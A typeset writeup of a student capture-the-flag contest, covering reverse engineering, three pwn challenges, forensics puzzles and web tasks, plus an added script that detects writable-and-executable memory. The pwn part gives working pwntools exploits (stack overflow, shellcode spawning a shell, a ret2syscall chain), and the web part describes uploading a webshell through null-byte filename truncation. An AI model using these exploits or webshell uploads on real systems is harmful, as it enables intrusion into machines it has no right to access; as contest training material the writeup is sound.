% Options for packages loaded elsewhere
\PassOptionsToPackage{unicode=true}{hyperref}
\PassOptionsToPackage{hyphens}{url}
%
\documentclass[
]{ctexart}
\usepackage{lmodern}
\usepackage{amssymb,amsmath}
\usepackage{ifxetex,ifluatex}
\ifnum 0\ifxetex 1\fi\ifluatex 1\fi=0 % if pdftex
  \usepackage[T1]{fontenc}
  \usepackage[utf8]{inputenc}
  \usepackage{textcomp} % provides euro and other symbols
\else % if luatex or xelatex
  \usepackage{unicode-math}
  \defaultfontfeatures{Scale=MatchLowercase}
  \defaultfontfeatures[\rmfamily]{Ligatures=TeX,Scale=1}
\fi
% Use upquote if available, for straight quotes in verbatim environments
\IfFileExists{upquote.sty}{\usepackage{upquote}}{}
\IfFileExists{microtype.sty}{% use microtype if available
  \usepackage[]{microtype}
  \UseMicrotypeSet[protrusion]{basicmath} % disable protrusion for tt fonts
}{}
\makeatletter
\@ifundefined{KOMAClassName}{% if non-KOMA class
  \IfFileExists{parskip.sty}{%
    \usepackage{parskip}
  }{% else
    \setlength{\parindent}{0pt}
    \setlength{\parskip}{6pt plus 2pt minus 1pt}}
}{% if KOMA class
  \KOMAoptions{parskip=half}}
\makeatother
\usepackage{xcolor}
\IfFileExists{xurl.sty}{\usepackage{xurl}}{} % add URL line breaks if available
\IfFileExists{bookmark.sty}{\usepackage{bookmark}}{\usepackage{hyperref}}
\hypersetup{
  pdftitle={0x3f 新生赛 writeup},
  pdfauthor={TooYoungTooSimp},
  hidelinks,
}
\urlstyle{same} % disable monospaced font for URLs
\usepackage{color}
\usepackage{fancyvrb}
\newcommand{\VerbBar}{|}
\newcommand{\VERB}{\Verb[commandchars=\\\{\}]}
\DefineVerbatimEnvironment{Highlighting}{Verbatim}{commandchars=\\\{\}}
% Add ',fontsize=\small' for more characters per line
\newenvironment{Shaded}{}{}
\newcommand{\AlertTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
\newcommand{\AnnotationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\AttributeTok}[1]{\textcolor[rgb]{0.49,0.56,0.16}{#1}}
\newcommand{\BaseNTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\BuiltInTok}[1]{#1}
\newcommand{\CharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\CommentTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textit{#1}}}
\newcommand{\CommentVarTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\ConstantTok}[1]{\textcolor[rgb]{0.53,0.00,0.00}{#1}}
\newcommand{\ControlFlowTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
\newcommand{\DataTypeTok}[1]{\textcolor[rgb]{0.56,0.13,0.00}{#1}}
\newcommand{\DecValTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\DocumentationTok}[1]{\textcolor[rgb]{0.73,0.13,0.13}{\textit{#1}}}
\newcommand{\ErrorTok}[1]{\textcolor[rgb]{1.00,0.00,0.00}{\textbf{#1}}}
\newcommand{\ExtensionTok}[1]{#1}
\newcommand{\FloatTok}[1]{\textcolor[rgb]{0.25,0.63,0.44}{#1}}
\newcommand{\FunctionTok}[1]{\textcolor[rgb]{0.02,0.16,0.49}{#1}}
\newcommand{\ImportTok}[1]{#1}
\newcommand{\InformationTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\newcommand{\KeywordTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{\textbf{#1}}}
\newcommand{\NormalTok}[1]{#1}
\newcommand{\OperatorTok}[1]{\textcolor[rgb]{0.40,0.40,0.40}{#1}}
\newcommand{\OtherTok}[1]{\textcolor[rgb]{0.00,0.44,0.13}{#1}}
\newcommand{\PreprocessorTok}[1]{\textcolor[rgb]{0.74,0.48,0.00}{#1}}
\newcommand{\RegionMarkerTok}[1]{#1}
\newcommand{\SpecialCharTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\SpecialStringTok}[1]{\textcolor[rgb]{0.73,0.40,0.53}{#1}}
\newcommand{\StringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\VariableTok}[1]{\textcolor[rgb]{0.10,0.09,0.49}{#1}}
\newcommand{\VerbatimStringTok}[1]{\textcolor[rgb]{0.25,0.44,0.63}{#1}}
\newcommand{\WarningTok}[1]{\textcolor[rgb]{0.38,0.63,0.69}{\textbf{\textit{#1}}}}
\setlength{\emergencystretch}{3em} % prevent overfull lines
\providecommand{\tightlist}{%
  \setlength{\itemsep}{0pt}\setlength{\parskip}{0pt}}
\setcounter{secnumdepth}{-\maxdimen} % remove section numbering
% Redefines (sub)paragraphs to behave more like sections
\ifx\paragraph\undefined\else
  \let\oldparagraph\paragraph
  \renewcommand{\paragraph}[1]{\oldparagraph{#1}\mbox{}}
\fi
\ifx\subparagraph\undefined\else
  \let\oldsubparagraph\subparagraph
  \renewcommand{\subparagraph}[1]{\oldsubparagraph{#1}\mbox{}}
\fi
% Set default figure placement to htbp
\makeatletter
\def\fps@figure{htbp}
\makeatother

\title{0x3f Freshman Contest Writeup}
\author{TooYoungTooSimp}
\date{2019/03/31}

\begin{document}
\maketitle

{
\setcounter{tocdepth}{3}
\tableofcontents
}
\hypertarget{x3fux65b0ux751fux8d5b-writeup}{%
\section{0x3f Freshman Contest Writeup}\label{x3fux65b0ux751fux8d5b-writeup}}

\hypertarget{re}{%
\subsection{Re}\label{re}}

\hypertarget{r}{%
\subsubsection{R}\label{r}}

Download the executable and open it in IDA. At the end of \texttt{main} there is a series of \texttt{mov} instructions; displaying their immediate operands as characters gives the flag.

\hypertarget{pwn}{%
\subsection{Pwn}\label{pwn}}

\hypertarget{pwn1}{%
\subsubsection{pwn1}\label{pwn1}}

A simple stack overflow.

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\CommentTok{# 0x20 bytes of buffer, 8 bytes of saved rbp, then the overwritten return address}
\NormalTok{pld}\OperatorTok{=}\StringTok{b'a'}\OperatorTok{*}\BaseNTok{0x20}\OperatorTok{+}\StringTok{b'b'}\OperatorTok{*}\DecValTok{8}\OperatorTok{+}\NormalTok{p64(}\BaseNTok{0x401182}\NormalTok{)}
\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./01'}\NormalTok{)}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
\end{Highlighting}
\end{Shaded}

\hypertarget{pwn2}{%
\subsubsection{pwn2}\label{pwn2}}

Following the hint leads to the C++ global-variable initialization function, which \texttt{mmap}s an RWX region of memory; the immediate written into it disassembles to \texttt{jmp\ rsp}, and the stack is executable as well, so the solution is as follows:

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\NormalTok{context.arch }\OperatorTok{=} \StringTok{'amd64'}
\NormalTok{sh }\OperatorTok{=}\NormalTok{ process(}\StringTok{'./02'}\NormalTok{)}
\CommentTok{# return into the jmp rsp inside the RWX mmap region; rsp then points at the shellcode that follows}
\NormalTok{pld }\OperatorTok{=} \StringTok{b'a'} \OperatorTok{*} \BaseNTok{0x40} \OperatorTok{+} \StringTok{b'b'} \OperatorTok{*} \DecValTok{8} \OperatorTok{+}\NormalTok{ p64(}\BaseNTok{0x666666660000}\NormalTok{) }\OperatorTok{+}\NormalTok{ asm(shellcraft.sh())}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
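\end{Highlighting}
\end{Shaded}

What makes pwn2 solvable is a mapping that is both writable and executable: the RWX \texttt{mmap} region and the executable stack both show up in \texttt{/proc/<pid>/maps} as \texttt{rwxp}. The script below is an added defender-side check, not part of the original writeup: it parses maps output and reports every W+X region, treating \texttt{[stack]} separately. The sample maps lines are constructed for the example, not captured from the challenge binary.

```python
import re

# Constructed /proc/<pid>/maps sample (not captured from the challenge binary): the
# binary's own segments, one anonymous RWX region, libc, and an executable stack.
SAMPLE_MAPS = """\
00400000-00401000 r--p 00000000 08:01 123456 /home/user/02
00401000-00402000 r-xp 00001000 08:01 123456 /home/user/02
00402000-00403000 rw-p 00002000 08:01 123456 /home/user/02
666666660000-666666661000 rwxp 00000000 00:00 0
7ffff7dd3000-7ffff7dfc000 r-xp 00000000 08:01 654321 /usr/lib/libc.so.6
7ffffffde000-7ffffffff000 rwxp 00000000 00:00 0 [stack]
"""

# address range, perms, offset, dev, inode, optional path
MAPS_RE = re.compile(
    r"^(?P<start>[0-9a-f]+)-(?P<end>[0-9a-f]+)\s+(?P<perms>[rwxps-]{4})\s+"
    r"[0-9a-f]+\s+\S+\s+\d+\s*(?P<path>.*)$"
)


def parse_maps(text):
    """Parse /proc/<pid>/maps text into a list of dicts, skipping malformed lines."""
    regions = []
    for line in text.splitlines():
        m = MAPS_RE.match(line.strip())
        if m:
            regions.append({
                "start": int(m.group("start"), 16),
                "end": int(m.group("end"), 16),
                "perms": m.group("perms"),
                "path": m.group("path").strip(),
            })
    return regions


def find_risky_mappings(text):
    """Describe every mapping that is both writable and executable (W^X violation)."""
    findings = []
    for r in parse_maps(text):
        if "w" in r["perms"] and "x" in r["perms"]:
            # an executable stack is what makes a jmp rsp gadget usable, so name it
            kind = "executable stack" if r["path"] == "[stack]" else "rwx mapping"
            label = r["path"] or "anonymous"
            findings.append(f"{kind}: {r['start']:#x}-{r['end']:#x} {r['perms']} {label}")
    return findings


if __name__ == "__main__":
    for finding in find_risky_mappings(SAMPLE_MAPS):
        print(finding)
```

Run it against a live process with `find_risky_mappings(open(f"/proc/{pid}/maps").read())`; a clean binary built with a non-executable stack and no RWX allocations returns an empty list.

\begin{Shaded}
\begin{Highlighting}[]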
\end{Highlighting}
\end{Shaded}

\hypertarget{pwn3}{%
\subsubsection{pwn3}\label{pwn3}}

No PIE and statically linked, so this is clearly ret2syscall. Find the gadget addresses with ROPgadget and use them directly. Note that a target address containing \texttt{\textbackslash{}x0a} truncates the input, because \texttt{\textquotesingle{}\textbackslash{}n\textquotesingle{}\ ==\ \textquotesingle{}\textbackslash{}x0a\textquotesingle{}}.

\begin{Shaded}
\begin{Highlighting}[]
\ImportTok{from}\NormalTok{ pwn }\ImportTok{import} \OperatorTok{*}
\CommentTok{# 32-bit static binary: make flat() pack integers as 4-byte values}
\NormalTok{context.arch }\OperatorTok{=} \StringTok{'i386'}
\CommentTok{# gadget and string addresses found with ROPgadget (no PIE, so they are fixed)}
\NormalTok{adb}\OperatorTok{=}\BaseNTok{0x080570c4}
\NormalTok{cbx}\OperatorTok{=}\BaseNTok{0x0806f1b2}
\NormalTok{bsh}\OperatorTok{=}\BaseNTok{0x080dc068}
\NormalTok{i80}\OperatorTok{=}\BaseNTok{0x0804a31a}
\NormalTok{sh}\OperatorTok{=}\NormalTok{process(}\StringTok{'./03'}\NormalTok{)}
\CommentTok{# 0x30 bytes of buffer, 4 bytes of saved ebp, then the ret2syscall chain}
\NormalTok{pld}\OperatorTok{=}\NormalTok{flat([}\StringTok{b'a'}\OperatorTok{*}\BaseNTok{0x30}\NormalTok{,}\StringTok{b'b'}\OperatorTok{*}\DecValTok{4}\NormalTok{,adb,}\BaseNTok{0xb}\NormalTok{,}\DecValTok{0}\NormalTok{,bsh,cbx,}\DecValTok{0}\NormalTok{,bsh,i80])}
\NormalTok{sh.sendline(pld)}
\NormalTok{sh.interactive()}
\end{Highlighting}
\end{Shaded}

\hypertarget{misc}{%
\subsection{Misc}\label{misc}}

\hypertarget{cap}{%
\subsubsection{cap}\label{cap}}

Repair the cap file with the website given in the hint to obtain a fixed pcap. Follow the TCP stream: two positions hold \texttt{lf} and \texttt{ga}, and concatenating those two positions across the subsequent series of packets gives the flag.

\hypertarget{picture}{%
\subsubsection{picture}\label{picture}}

Download and extract the file to get an image. Open it in stegsolve: the least significant bit of the green channel appears to carry data. Export it, repair the BMP header according to the hint, open the result, and the flag is visible.

\hypertarget{ux7b7eux5230}{%
\subsubsection{Sign-in}\label{ux7b7eux5230}}

Copy and paste; nothing more to say.

\hypertarget{web}{%
\subsection{Web}\label{web}}

\hypertarget{upload}{%
\subsubsection{upload}\label{upload}}

Arbitrary file upload. Intercept the upload request with Burp Suite and use a 0x00 byte to truncate the filename; upload a one-line webshell this way, then browse the server's directories with a China Chopper-style tool, and the flag is easy to find.

\hypertarget{section}{%
\subsubsection{404}\label{section}}

Open the developer tools: although the page looks like a 404, the response is actually 200, and the flag is in the HTTP headers.

\hypertarget{ios88}{%
\subsubsection{ios88}\label{ios88}}

Change the User-Agent to an iOS one and set all the version numbers to 88; the flag then appears in the HTTP headers.

\end{document}